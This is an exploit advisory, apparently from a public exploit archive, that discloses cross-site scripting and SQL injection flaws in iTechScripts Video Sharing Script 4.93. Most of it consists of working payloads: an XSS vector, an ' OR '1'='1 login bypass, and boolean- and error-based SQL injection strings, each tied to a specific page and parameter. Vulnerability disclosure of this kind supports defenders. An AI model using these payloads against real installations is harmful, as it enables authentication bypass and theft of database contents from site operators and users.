iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection: Posted Jan 18, 2017; Authored by Hasan Emre Ozer; iTechScripts Video Sharing Script version 4.93 suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | f8f26c8cff785165056ce43d50ede1b607c404fce7a58bbca31b4c5e4bdf95de; Download | Favorite | View

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

Exploit Title : Video Sharing Script v4.93 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/video-sharing-script/
<http://itechscripts.com/image-sharing-script/>
Sofware Price and Demo : $250
http://video-sharing.itechscripts.com
<http://photo-sharing.itechscripts.com/>

--------------------------------------------------------

Type: Self XSS
Vulnerable URL: http://localhost/[PATH]/sign-in.php
Vulnerable Parameters : usr_name
Method: POST
Payload:"><img src=i onerror=prompt(1)>
--------------------------------------------------------
Type: Login Bypass
Vulnerable URL: http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' OR '1'='1

--------------------------------------------------------

Type: Boolean  Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' RLIKE (SELECT (CASE WHEN (5118=5118) THEN 0x66616661 ELSE 0x28
END))-- kwfL
--------------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/watch-video.php
<http://localhost/%5BPATH%5D/list_temp_photo_pin_upload.php>
Vulnerable Parameters: v
Method: GET
Payload: ' AND (SELECT 6330 FROM(SELECT
COUNT(*),CONCAT(0x7170787871,(SELECT
(ELT(6330=6330,1))),0x71767a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- jvSl

--------------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/show_like.php
<http://localhost/%5BPATH%5D/list_temp_photo_pin_upload.php>
Vulnerable Parameters: vid
Method: GET
Payload: ' AND (SELECT 6330 FROM(SELECT
COUNT(*),CONCAT(0x7170787871,(SELECT
(ELT(6330=6330,1))),0x71767a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- jvSl
--------------------------------------------------------

Type: Boolean  Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' RLIKE (SELECT (CASE WHEN (5118=5118) THEN 0x66616661 ELSE 0x28
END))-- kwfL

-- 
Best Regards,
Hasan Emre

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 65 files
LiquidWorm 25 files
Debian 18 files
indoushka 15 files
Apple 10 files
Google Security Research 7 files
Gentoo 5 files
Emiliano Febbi 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,155)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,813)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,236)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,965)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

Share This

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems